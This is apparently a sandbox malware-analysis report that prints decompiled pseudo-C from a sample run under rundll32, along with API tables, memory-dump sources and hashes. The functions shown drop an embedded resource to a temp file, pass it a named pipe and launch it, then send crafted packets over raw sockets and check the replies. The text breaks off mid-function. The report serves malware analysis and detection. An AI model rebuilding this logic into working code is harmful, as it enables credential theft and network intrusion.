                                                                                                                                                  				signed int _t102;
                                                                                                                                                  				intOrPtr _t103;
                                                                                                                                                  				intOrPtr _t104;
                                                                                                                                                  				void* _t105;
                                                                                                                                                  				int _t109;
                                                                                                                                                  				void* _t114;
                                                                                                                                                  
                                                                                                                                                  				_t99 = __ecx;
                                                                                                                                                  				E0477A760(0x168c);
                                                                                                                                                  				_t95 = 0;
                                                                                                                                                  				_v8 = 0;
                                                                                                                                                  				_v12 = 0;
                                                                                                                                                  				_t7 = (0 | E04776F7C(_t99, GetCurrentProcess()) != 0x00000000) + 1; // 0x1, executed
                                                                                                                                                  				_t56 = E04778313(_t7,  &_v8,  &_v12); // executed
                                                                                                                                                  				if(_t56 != 0) {
                                                                                                                                                  					_t57 = 0;
                                                                                                                                                  					do {
                                                                                                                                                  						_t8 = _t57 + L"C:\\Windows\\"; // 0x3a0043
                                                                                                                                                  						_t102 =  *_t8 & 0x0000ffff;
                                                                                                                                                  						 *(_t114 + _t57 - 0x68c) = _t102;
                                                                                                                                                  						_t57 = _t57 + 2;
                                                                                                                                                  					} while (_t102 != 0);
                                                                                                                                                  					_t59 = GetTempFileNameW( &_v1680, 0, 0,  &_v1680); // executed
                                                                                                                                                  					if(_t59 == 0) {
                                                                                                                                                  						L16:
                                                                                                                                                  						_t103 = _v12;
                                                                                                                                                  						_t60 = _v8;
                                                                                                                                                  						if(_t103 == _t95) {
                                                                                                                                                  							L18:
                                                                                                                                                  							_t62 = RtlFreeHeap(GetProcessHeap(), _t95, _v8); // executed
                                                                                                                                                  							return _t62;
                                                                                                                                                  						} else {
                                                                                                                                                  							goto L17;
                                                                                                                                                  						}
                                                                                                                                                  						do {
                                                                                                                                                  							L17:
                                                                                                                                                  							 *_t60 = _t95;
                                                                                                                                                  							_t60 =  &(_t60[0]);
                                                                                                                                                  							_t103 = _t103 - 1;
                                                                                                                                                  						} while (_t103 != 0);
                                                                                                                                                  						goto L18;
                                                                                                                                                  					}
                                                                                                                                                  					_v36 = 0;
                                                                                                                                                  					asm("stosd");
                                                                                                                                                  					asm("stosd");
                                                                                                                                                  					asm("stosd");
                                                                                                                                                  					_t64 =  &_v36;
                                                                                                                                                  					__imp__CoCreateGuid(_t64, _t105); // executed
                                                                                                                                                  					if(_t64 < 0) {
                                                                                                                                                  						L15:
                                                                                                                                                  						goto L16;
                                                                                                                                                  					}
                                                                                                                                                  					_t66 =  &_v36;
                                                                                                                                                  					_v16 = 0;
                                                                                                                                                  					__imp__StringFromCLSID(_t66,  &_v16); // executed
                                                                                                                                                  					if(_t66 < 0) {
                                                                                                                                                  						goto L15;
                                                                                                                                                  					}
                                                                                                                                                  					_t68 = E04776FAF(_v12,  &_v1680, _v8); // executed
                                                                                                                                                  					if(_t68 == 0) {
                                                                                                                                                  						L14:
                                                                                                                                                  						__imp__CoTaskMemFree(_v16);
                                                                                                                                                  						_t95 = 0;
                                                                                                                                                  						goto L15;
                                                                                                                                                  					}
                                                                                                                                                  					wsprintfW( &_v3728, L"\\\\.\\pipe\\%ws", _v16);
                                                                                                                                                  					_t72 = CreateThread(0, 0, E04776FFE,  &_v3728, 0, 0); // executed
                                                                                                                                                  					_v20 = _t72;
                                                                                                                                                  					if(_t72 != 0) {
                                                                                                                                                  						asm("stosd");
                                                                                                                                                  						asm("stosd");
                                                                                                                                                  						asm("stosd");
                                                                                                                                                  						asm("stosd");
                                                                                                                                                  						_t109 = 0x44;
                                                                                                                                                  						memset( &_v120, 0, _t109);
                                                                                                                                                  						_v120.wShowWindow = 0;
                                                                                                                                                  						_v120.cb = _t109;
                                                                                                                                                  						wsprintfW( &_v5776, L"\"%ws\" %ws",  &_v1680,  &_v3728);
                                                                                                                                                  						_t90 = CreateProcessW( &_v1680,  &_v5776, 0, 0, 0, 0x8000000, 0, 0,  &_v120,  &_v52); // executed
                                                                                                                                                  						if(_t90 != 0) {
                                                                                                                                                  							WaitForSingleObject(_v52, 0xea60);
                                                                                                                                                  							E04776CC8( *0x4787b80);
                                                                                                                                                  							TerminateThread(_v20, 0); // executed
                                                                                                                                                  						}
                                                                                                                                                  						CloseHandle(_v20);
                                                                                                                                                  					}
                                                                                                                                                  					_t104 = _v12;
                                                                                                                                                  					_t73 = _v8;
                                                                                                                                                  					if(_t104 == 0) {
                                                                                                                                                  						L13:
                                                                                                                                                  						E04776FAF(_v12,  &_v1680, _v8); // executed
                                                                                                                                                  						DeleteFileW( &_v1680); // executed
                                                                                                                                                  						goto L14;
                                                                                                                                                  					} else {
                                                                                                                                                  						do {
                                                                                                                                                  							 *_t73 = 0;
                                                                                                                                                  							_t73 = _t73 + 1;
                                                                                                                                                  							_t104 = _t104 - 1;
                                                                                                                                                  						} while (_t104 != 0);
                                                                                                                                                  						goto L13;
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				return _t56;
                                                                                                                                                  			}


































                                                                                                                                                  0x04777146
                                                                                                                                                  0x0477714e
                                                                                                                                                  0x0477715b
                                                                                                                                                  0x0477715e
                                                                                                                                                  0x04777161
                                                                                                                                                  0x04777177
                                                                                                                                                  0x0477717a
                                                                                                                                                  0x04777181
                                                                                                                                                  0x04777187
                                                                                                                                                  0x04777189
                                                                                                                                                  0x04777189
                                                                                                                                                  0x04777189
                                                                                                                                                  0x04777190
                                                                                                                                                  0x04777198
                                                                                                                                                  0x0477719b
                                                                                                                                                  0x047771aa
                                                                                                                                                  0x047771b2
                                                                                                                                                  0x04777318
                                                                                                                                                  0x04777318
                                                                                                                                                  0x0477731b
                                                                                                                                                  0x04777320
                                                                                                                                                  0x04777328
                                                                                                                                                  0x04777333
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04777322
                                                                                                                                                  0x04777322
                                                                                                                                                  0x04777322
                                                                                                                                                  0x04777324
                                                                                                                                                  0x04777325
                                                                                                                                                  0x04777325
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04777322
                                                                                                                                                  0x047771bb
                                                                                                                                                  0x047771c1
                                                                                                                                                  0x047771c2
                                                                                                                                                  0x047771c3
                                                                                                                                                  0x047771c4
                                                                                                                                                  0x047771c8
                                                                                                                                                  0x047771d0
                                                                                                                                                  0x04777317
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04777317
                                                                                                                                                  0x047771da
                                                                                                                                                  0x047771de
                                                                                                                                                  0x047771e1
                                                                                                                                                  0x047771e9
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x047771fc
                                                                                                                                                  0x04777203
                                                                                                                                                  0x0477730c
                                                                                                                                                  0x0477730f
                                                                                                                                                  0x04777315
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04777315
                                                                                                                                                  0x0477721f
                                                                                                                                                  0x04777236
                                                                                                                                                  0x0477723c
                                                                                                                                                  0x04777241
                                                                                                                                                  0x0477724c
                                                                                                                                                  0x0477724d
                                                                                                                                                  0x0477724e
                                                                                                                                                  0x04777251
                                                                                                                                                  0x04777252
                                                                                                                                                  0x04777259
                                                                                                                                                  0x04777260
                                                                                                                                                  0x0477727e
                                                                                                                                                  0x04777281
                                                                                                                                                  0x047772a6
                                                                                                                                                  0x047772ae
                                                                                                                                                  0x047772b8
                                                                                                                                                  0x047772c4
                                                                                                                                                  0x047772cd
                                                                                                                                                  0x047772cd
                                                                                                                                                  0x047772d6
                                                                                                                                                  0x047772d6
                                                                                                                                                  0x047772dc
                                                                                                                                                  0x047772df
                                                                                                                                                  0x047772e5
                                                                                                                                                  0x047772ed
                                                                                                                                                  0x047772fa
                                                                                                                                                  0x04777306
                                                                                                                                                  0x00000000
                                                                                                                                                  0x047772e7
                                                                                                                                                  0x047772e7
                                                                                                                                                  0x047772e7
                                                                                                                                                  0x047772e9
                                                                                                                                                  0x047772ea
                                                                                                                                                  0x047772ea
                                                                                                                                                  0x00000000
                                                                                                                                                  0x047772e7
                                                                                                                                                  0x047772e5
                                                                                                                                                  0x0477733b

                                                                                                                                                  APIs
                                                                                                                                                  • GetCurrentProcess.KERNEL32(?,?,00000000,?,04777AF8), ref: 04777164
                                                                                                                                                    • Part of subcall function 04776F7C: GetModuleHandleW.KERNEL32(kernel32.dll,IsWow64Process,?,?,04777170,00000000,?,04777AF8), ref: 04776F8E
                                                                                                                                                    • Part of subcall function 04776F7C: GetProcAddress.KERNEL32(00000000), ref: 04776F95
                                                                                                                                                    • Part of subcall function 04778313: FindResourceW.KERNEL32(?,00000006,00000000,?), ref: 0477832A
                                                                                                                                                    • Part of subcall function 04778313: LoadResource.KERNEL32(00000000), ref: 04778341
                                                                                                                                                    • Part of subcall function 04778313: LockResource.KERNEL32(00000000), ref: 04778350
                                                                                                                                                    • Part of subcall function 04778313: SizeofResource.KERNEL32(00000000), ref: 04778368
                                                                                                                                                    • Part of subcall function 04778313: GetProcessHeap.KERNEL32(00000000,00000000,?,00000002), ref: 04778384
                                                                                                                                                    • Part of subcall function 04778313: RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 0477838D
                                                                                                                                                    • Part of subcall function 04778313: memcpy.MSVCRT ref: 0477839C
                                                                                                                                                    • Part of subcall function 04778313: GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,00000002), ref: 047783B9
                                                                                                                                                    • Part of subcall function 04778313: RtlAllocateHeap.NTDLL(00000000,?,?,?,00000002), ref: 047783BC
                                                                                                                                                    • Part of subcall function 04778313: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,00000002), ref: 0477840A
                                                                                                                                                    • Part of subcall function 04778313: RtlFreeHeap.NTDLL(00000000,?,?,?,00000002), ref: 0477840D
                                                                                                                                                  • GetTempFileNameW.KERNELBASE(?,00000000,00000000,?,00000000,?,04777AF8), ref: 047771AA
                                                                                                                                                  • CoCreateGuid.OLE32(?,74CB43E0,?,04777AF8), ref: 047771C8
                                                                                                                                                  • StringFromCLSID.OLE32(?,?,?,04777AF8), ref: 047771E1
                                                                                                                                                  • wsprintfW.USER32 ref: 0477721F
                                                                                                                                                  • CreateThread.KERNELBASE ref: 04777236
                                                                                                                                                  • memset.MSVCRT ref: 04777259
                                                                                                                                                  • wsprintfW.USER32 ref: 04777281
                                                                                                                                                  • CreateProcessW.KERNELBASE ref: 047772A6
                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,0000EA60), ref: 047772B8
                                                                                                                                                    • Part of subcall function 04776CC8: EnterCriticalSection.KERNEL32(?,04777B03), ref: 04776CCD
                                                                                                                                                    • Part of subcall function 04776CC8: InterlockedExchange.KERNEL32(?,00000001), ref: 04776CD9
                                                                                                                                                    • Part of subcall function 04776CC8: LeaveCriticalSection.KERNEL32(?), ref: 04776CE0
                                                                                                                                                  • TerminateThread.KERNELBASE(?,00000000), ref: 047772CD
                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 047772D6
                                                                                                                                                  • DeleteFileW.KERNELBASE(?,?,?), ref: 04777306
                                                                                                                                                  • CoTaskMemFree.OLE32(?,?,?,?,04777AF8), ref: 0477730F
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?,?,04777AF8), ref: 0477732C
                                                                                                                                                  • RtlFreeHeap.NTDLL(00000000,?,04777AF8), ref: 04777333
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.345534570.0000000004771000.00000020.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.345467981.0000000004770000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345651002.000000000477D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345685144.0000000004783000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345701016.0000000004789000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_4770000_rundll32.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Heap$Process$Resource$CreateFree$AllocateCriticalFileHandleSectionThreadwsprintf$AddressCloseCurrentDeleteEnterExchangeFindFromGuidInterlockedLeaveLoadLockModuleNameObjectProcSingleSizeofStringTaskTempTerminateWaitmemcpymemset
                                                                                                                                                  • String ID: "%ws" %ws$\\.\pipe\%ws
                                                                                                                                                  • API String ID: 1475553426-4065786000
                                                                                                                                                  • Opcode ID: 1d6ec3108adf8494f98b0cfa190fa5467aff95cfc7030dbdb480f4a57d3a637a
                                                                                                                                                  • Instruction ID: 780e7d3214b97f5be427f92cd63cc0330ede1eb6d90277a5ac666a34e5203e12
                                                                                                                                                  • Opcode Fuzzy Hash: 1d6ec3108adf8494f98b0cfa190fa5467aff95cfc7030dbdb480f4a57d3a637a
                                                                                                                                                  • Instruction Fuzzy Hash: 7451FCB1900219AFDF219FE4DD88DEEB7BDEF08254F948565F605E3210EA35AE458B20
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  C-Code - Quality: 64%
                                                                                                                                                  			E047721DC(intOrPtr _a4, void** _a8, void* _a12) {
                                                                                                                                                  				char _v5;
                                                                                                                                                  				void* _v12;
                                                                                                                                                  				void* _v16;
                                                                                                                                                  				void* _t35;
                                                                                                                                                  				void* _t42;
                                                                                                                                                  				short _t44;
                                                                                                                                                  				void* _t47;
                                                                                                                                                  				void* _t50;
                                                                                                                                                  				void* _t51;
                                                                                                                                                  				signed int _t57;
                                                                                                                                                  				signed int _t60;
                                                                                                                                                  				void* _t66;
                                                                                                                                                  				void* _t74;
                                                                                                                                                  				void* _t77;
                                                                                                                                                  				void* _t79;
                                                                                                                                                  
                                                                                                                                                  				_v5 = 0;
                                                                                                                                                  				_t35 = HeapAlloc(GetProcessHeap(), 8, 0xffff);
                                                                                                                                                  				_v12 = _t35;
                                                                                                                                                  				if(_t35 == 0) {
                                                                                                                                                  					L13:
                                                                                                                                                  					return _v5;
                                                                                                                                                  				}
                                                                                                                                                  				_t66 = HeapAlloc(GetProcessHeap(), 8, 0x2d);
                                                                                                                                                  				_v16 = _t66;
                                                                                                                                                  				if(_t66 == 0) {
                                                                                                                                                  					L12:
                                                                                                                                                  					HeapFree(GetProcessHeap(), 8, _v12);
                                                                                                                                                  					goto L13;
                                                                                                                                                  				}
                                                                                                                                                  				_t57 = 9;
                                                                                                                                                  				_t42 = memcpy(_t66,  *_a8, _t57 << 2);
                                                                                                                                                  				__imp__#9(0x29);
                                                                                                                                                  				_t77 = _v16;
                                                                                                                                                  				 *(_t77 + 2) = _t42;
                                                                                                                                                  				_t44 =  *_a12;
                                                                                                                                                  				 *((char*)(_t77 + 8)) = 4;
                                                                                                                                                  				 *((char*)(_t77 + 0x24)) = 3;
                                                                                                                                                  				 *((short*)(_t77 + 0x25)) = _t44;
                                                                                                                                                  				__imp__#19(_a4, _t77, 0x2d, 0); // executed
                                                                                                                                                  				if(_t44 > 0) {
                                                                                                                                                  					__imp__#16(_a4, _v12, 0xffff, 0); // executed
                                                                                                                                                  					if(_t44 > 0) {
                                                                                                                                                  						_t47 = _v12;
                                                                                                                                                  						if( *((intOrPtr*)(_t47 + 9)) == 0) {
                                                                                                                                                  							 *_a12 = 0;
                                                                                                                                                  							memset(_t47, 0, 0xffff);
                                                                                                                                                  							_t50 = HeapAlloc(GetProcessHeap(), 8, 0x27);
                                                                                                                                                  							_a12 = _t50;
                                                                                                                                                  							if(_t50 != 0) {
                                                                                                                                                  								_t60 = 9;
                                                                                                                                                  								_t51 = memcpy(_t50,  *_a8, _t60 << 2);
                                                                                                                                                  								__imp__#9(0x23);
                                                                                                                                                  								_t79 = _a12;
                                                                                                                                                  								 *(_t79 + 2) = _t51;
                                                                                                                                                  								 *((char*)(_t79 + 8)) = 0x71;
                                                                                                                                                  								__imp__#19(_a4, _t79, 0x27, 0);
                                                                                                                                                  								if(_t51 > 0) {
                                                                                                                                                  									_t74 = _v12;
                                                                                                                                                  									__imp__#16(_a4, _t74, 0xffff, 0);
                                                                                                                                                  									if(_t51 > 0 &&  *((intOrPtr*)(_t74 + 9)) == 0) {
                                                                                                                                                  										 *((short*)( *_a8 + 0x1c)) = 0;
                                                                                                                                                  										_v5 = 1;
                                                                                                                                                  									}
                                                                                                                                                  								}
                                                                                                                                                  								HeapFree(GetProcessHeap(), 8, _t79);
                                                                                                                                                  								_t77 = _v16;
                                                                                                                                                  							}
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				HeapFree(GetProcessHeap(), 8, _t77);
                                                                                                                                                  				goto L12;
                                                                                                                                                  			}


















                                                                                                                                                  0x047721f1
                                                                                                                                                  0x047721fe
                                                                                                                                                  0x04772200
                                                                                                                                                  0x04772205
                                                                                                                                                  0x0477233b
                                                                                                                                                  0x04772341
                                                                                                                                                  0x04772341
                                                                                                                                                  0x04772215
                                                                                                                                                  0x04772217
                                                                                                                                                  0x0477221c
                                                                                                                                                  0x0477232c
                                                                                                                                                  0x04772334
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0477233a
                                                                                                                                                  0x04772229
                                                                                                                                                  0x0477222c
                                                                                                                                                  0x0477222e
                                                                                                                                                  0x04772234
                                                                                                                                                  0x0477223b
                                                                                                                                                  0x04772242
                                                                                                                                                  0x04772249
                                                                                                                                                  0x0477224d
                                                                                                                                                  0x04772251
                                                                                                                                                  0x04772255
                                                                                                                                                  0x0477225d
                                                                                                                                                  0x04772271
                                                                                                                                                  0x04772279
                                                                                                                                                  0x0477227f
                                                                                                                                                  0x04772286
                                                                                                                                                  0x04772294
                                                                                                                                                  0x04772297
                                                                                                                                                  0x047722a6
                                                                                                                                                  0x047722ac
                                                                                                                                                  0x047722b1
                                                                                                                                                  0x047722ba
                                                                                                                                                  0x047722bf
                                                                                                                                                  0x047722c1
                                                                                                                                                  0x047722c7
                                                                                                                                                  0x047722d2
                                                                                                                                                  0x047722d6
                                                                                                                                                  0x047722da
                                                                                                                                                  0x047722e2
                                                                                                                                                  0x047722e4
                                                                                                                                                  0x047722f2
                                                                                                                                                  0x047722fa
                                                                                                                                                  0x04772309
                                                                                                                                                  0x0477230d
                                                                                                                                                  0x0477230d
                                                                                                                                                  0x047722fa
                                                                                                                                                  0x04772317
                                                                                                                                                  0x0477231d
                                                                                                                                                  0x0477231d
                                                                                                                                                  0x047722b1
                                                                                                                                                  0x04772286
                                                                                                                                                  0x04772279
                                                                                                                                                  0x04772326
                                                                                                                                                  0x00000000

                                                                                                                                                  APIs
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,0000FFFF,00000000,74CB4F20,?,?,?,?,?,?,?,?), ref: 047721F5
                                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 047721FE
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,0000002D,?), ref: 04772210
                                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 04772213
                                                                                                                                                  • htons.WS2_32(00000029), ref: 0477222E
                                                                                                                                                  • send.WS2_32(?,?,0000002D,00000000), ref: 04772255
                                                                                                                                                  • recv.WS2_32(?,?,0000FFFF,00000000), ref: 04772271
                                                                                                                                                  • memset.MSVCRT ref: 04772297
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000027), ref: 047722A3
                                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 047722A6
                                                                                                                                                  • htons.WS2_32(00000023), ref: 047722C1
                                                                                                                                                  • send.WS2_32(?,?,00000027,00000000), ref: 047722DA
                                                                                                                                                  • recv.WS2_32(?,?,0000FFFF,00000000), ref: 047722F2
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,?), ref: 04772314
                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 04772317
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,?), ref: 04772323
                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 04772326
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,?), ref: 04772331
                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 04772334
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.345534570.0000000004771000.00000020.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.345467981.0000000004770000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345651002.000000000477D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345685144.0000000004783000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345701016.0000000004789000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_4770000_rundll32.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Heap$Process$AllocFree$htonsrecvsend$memset
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 821554539-0
                                                                                                                                                  • Opcode ID: a8fccf02c872108e68d95800d69657aacc98405e72adc7252fee3998669d0b23
                                                                                                                                                  • Instruction ID: b45deee9be2f25f3d065f5990857ec5a79981598ab705e0e0f9869f0b1c5f8de
                                                                                                                                                  • Opcode Fuzzy Hash: a8fccf02c872108e68d95800d69657aacc98405e72adc7252fee3998669d0b23
                                                                                                                                                  • Instruction Fuzzy Hash: 04418E31A00305FFEF209FA5DC09F9E7BA5EF49750F408494FA59AB281D678E904CB51
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 337 47746c7-47746f4 GetProcessHeap HeapAlloc 338 4774aa4 337->338 339 47746fa-4774717 call 4772497 337->339 340 4774aab-4774ab2 338->340 342 477471c-477471e 339->342 343 4774724-477473f call 4773449 342->343 344 47747b1-47747bd GetProcessHeap HeapFree 342->344 343->344 347 4774741-4774743 343->347 344->340 348 4774745-4774756 call 4772e12 347->348 349 477475a-477475c 347->349 348->344 354 4774758 348->354 351 4774761-4774777 call 47729a2 349->351 357 47747cb 351->357 358 4774779-4774788 call 47721dc 351->358 356 47747ce-47747e7 call 477317c 354->356 356->344 363 47747e9-4774800 GetProcessHeap HeapAlloc 356->363 357->356 364 47747ae 358->364 365 477478a-47747a6 Sleep call 4772191 358->365 363->344 366 4774802-4774806 363->366 364->344 375 47747c2-47747c9 365->375 376 47747a8-47747ac 365->376 368 477480c-477481b GetProcessHeap HeapAlloc 366->368 369 4774959-477495d 366->369 373 477487e-4774882 368->373 374 477481d-477486c call 4773209 368->374 371 47749a6-47749df GetProcessHeap HeapAlloc 369->371 372 477495f-4774964 369->372 371->373 378 47749e5-4774a3c call 47733a4 371->378 372->371 377 4774966-47749a2 372->377 380 4774a91-4774a9f GetProcessHeap HeapFree 373->380 381 4774888-47748a4 Sleep GetProcessHeap HeapAlloc 373->381 388 4774872-4774878 GetProcessHeap HeapFree 374->388 389 477486e 374->389 375->364 376->364 382 477475e 376->382 377->371 378->388 391 4774a42-4774a49 378->391 380->344 381->380 383 47748aa-4774928 call 47732af GetProcessHeap HeapFree 381->383 382->351 392 4774a52-4774a70 call 4773680 383->392 393 477492e-477494e 383->393 388->373 389->388 391->392 397 4774a72-4774a88 call 47741e9 392->397 398 4774a8e 392->398 393->380 394 4774954-4774956 393->394 394->369 397->398 401 4774a8a 397->401 398->380 401->398
                                                                                                                                                  C-Code - Quality: 98%
                                                                                                                                                  			E047746C7(void* __ecx, intOrPtr _a4, void* _a8, char _a12, signed short* _a16, char _a20) {
                                                                                                                                                  				signed int _v8;
                                                                                                                                                  				void* _v12;
                                                                                                                                                  				intOrPtr _v16;
                                                                                                                                                  				signed int _v20;
                                                                                                                                                  				signed int _v24;
                                                                                                                                                  				void* __edi;
                                                                                                                                                  				void* _t146;
                                                                                                                                                  				intOrPtr _t151;
                                                                                                                                                  				void* _t160;
                                                                                                                                                  				intOrPtr _t172;
                                                                                                                                                  				short _t173;
                                                                                                                                                  				signed short _t174;
                                                                                                                                                  				short _t202;
                                                                                                                                                  				short _t205;
                                                                                                                                                  				short _t218;
                                                                                                                                                  				void* _t228;
                                                                                                                                                  				signed int _t242;
                                                                                                                                                  				void* _t248;
                                                                                                                                                  				void* _t249;
                                                                                                                                                  				void* _t251;
                                                                                                                                                  				void _t252;
                                                                                                                                                  
                                                                                                                                                  				_t228 = __ecx;
                                                                                                                                                  				_v8 = 0xc0c0c0c;
                                                                                                                                                  				_t251 = HeapAlloc(GetProcessHeap(), 8, 0x90);
                                                                                                                                                  				_v12 = _t251;
                                                                                                                                                  				if(_t251 == 0) {
                                                                                                                                                  					_v8 = 0xbadf00d;
                                                                                                                                                  				} else {
                                                                                                                                                  					_t246 = _a16;
                                                                                                                                                  					 *_t251 = 0xf00d;
                                                                                                                                                  					_t146 = E04772497(_t228, _a4,  &_a12,  *_a16 & 0x0000ffff,  &_v12, _a20); // executed
                                                                                                                                                  					if(_t146 != 0) {
                                                                                                                                                  						_v20 =  *(_a12 + 0x22) & 0x0000ffff;
                                                                                                                                                  						_t151 = E04773449( &_v12, _a20);
                                                                                                                                                  						_v16 = _t151;
                                                                                                                                                  						if(_t151 != 0xffffffff) {
                                                                                                                                                  							if(_t151 != 0) {
                                                                                                                                                  								_t252 = 0;
                                                                                                                                                  								while(E047729A2(_a4,  &_a12,  *_t246 & 0x0000ffff,  &_v12) != 0) {
                                                                                                                                                  									if(E047721DC(_a4,  &_a12, _t246) == 0) {
                                                                                                                                                  										L12:
                                                                                                                                                  										_t251 = _v12;
                                                                                                                                                  									} else {
                                                                                                                                                  										Sleep(0x7d0);
                                                                                                                                                  										if(E04772191( &_a12, _a4, _a8, _t246) == 0) {
                                                                                                                                                  											_v8 = 0xbadf00d;
                                                                                                                                                  											goto L12;
                                                                                                                                                  										} else {
                                                                                                                                                  											_t252 = _t252 + 1;
                                                                                                                                                  											if(_t252 < 0x10) {
                                                                                                                                                  												_t246 = _a16;
                                                                                                                                                  												continue;
                                                                                                                                                  											} else {
                                                                                                                                                  												goto L12;
                                                                                                                                                  											}
                                                                                                                                                  										}
                                                                                                                                                  									}
                                                                                                                                                  									goto L13;
                                                                                                                                                  								}
                                                                                                                                                  								_t251 = _v12;
                                                                                                                                                  								goto L16;
                                                                                                                                                  							} else {
                                                                                                                                                  								if(E04772E12(_a4, _a12,  *_t246 & 0x0000ffff) != 0) {
                                                                                                                                                  									L16:
                                                                                                                                                  									_v8 = 0xbadf00d;
                                                                                                                                                  									if(E0477317C(_t228, _a4,  &_a12,  *_t246 & 0x0000ffff) == 0) {
                                                                                                                                                  										goto L13;
                                                                                                                                                  									} else {
                                                                                                                                                  										_t160 = HeapAlloc(GetProcessHeap(), 8, 0x100);
                                                                                                                                                  										_a8 = _t160;
                                                                                                                                                  										if(_t160 == 0) {
                                                                                                                                                  											goto L13;
                                                                                                                                                  										} else {
                                                                                                                                                  											if(_v16 == 0) {
                                                                                                                                                  												L28:
                                                                                                                                                  												if(_a20 == 5 && 0 ==  *_t251) {
                                                                                                                                                  													 *((short*)(_t251 + 0x6c)) = 0x1010;
                                                                                                                                                  													 *((char*)(_t251 + 0x6e)) = 0x10;
                                                                                                                                                  													 *(_t251 + 0x50) = 0x28e0;
                                                                                                                                                  													 *((short*)(_t251 + 0x52)) = 0x7068;
                                                                                                                                                  													 *((short*)(_t251 + 0x54)) = 0x8078;
                                                                                                                                                  													 *((short*)(_t251 + 0x56)) = 0x9490;
                                                                                                                                                  													 *((char*)(_t251 + 0x58)) = 0xaa;
                                                                                                                                                  													 *(_t251 + 0x59) = 0xb4b8;
                                                                                                                                                  													 *((short*)(_t251 + 0x5c)) = 0xbaa0;
                                                                                                                                                  													 *((short*)(_t251 + 0x66)) = 0x4c40;
                                                                                                                                                  													 *((char*)(_t251 + 0x68)) = 0x68;
                                                                                                                                                  													 *((char*)(_t251 + 0x65)) = 0x10;
                                                                                                                                                  												}
                                                                                                                                                  												_t229 =  *(_t251 + 0x6d) & 0x000000ff;
                                                                                                                                                  												asm("cdq");
                                                                                                                                                  												asm("cdq");
                                                                                                                                                  												_t242 = (( *(_t251 + 0x50) & 0x000000ff) + ( *(_t251 + 0x6d) & 0x000000ff) + 8) % ( *(_t251 + 0x6d) & 0x000000ff) % _t229;
                                                                                                                                                  												 *(_t251 + 0x8a) = _t242;
                                                                                                                                                  												 *((short*)(_t251 + 0x8c)) = _t242 + 0xd08;
                                                                                                                                                  												_t248 = HeapAlloc(GetProcessHeap(), 8, 0x13);
                                                                                                                                                  												if(_t248 == 0) {
                                                                                                                                                  													goto L23;
                                                                                                                                                  												} else {
                                                                                                                                                  													 *((short*)(_t248 + 1)) = 0;
                                                                                                                                                  													 *((short*)(_t248 + 3)) = 1;
                                                                                                                                                  													 *((short*)(_t248 + 5)) = 0;
                                                                                                                                                  													 *((short*)(_t248 + 7)) = 0;
                                                                                                                                                  													 *((short*)(_t248 + 9)) = 0;
                                                                                                                                                  													 *((short*)(_t248 + 0xb)) = 1;
                                                                                                                                                  													_t202 = 0x34;
                                                                                                                                                  													 *((short*)(_t248 + 0xd)) = _t202;
                                                                                                                                                  													 *_t248 = 8;
                                                                                                                                                  													 *((short*)(_t248 + 0xf)) = ( *(_t251 + 0x59) & 0x000000ff) +  *((intOrPtr*)(_t251 + 0x8c));
                                                                                                                                                  													_t205 = 2;
                                                                                                                                                  													 *((short*)(_t248 + 0x11)) = _t205;
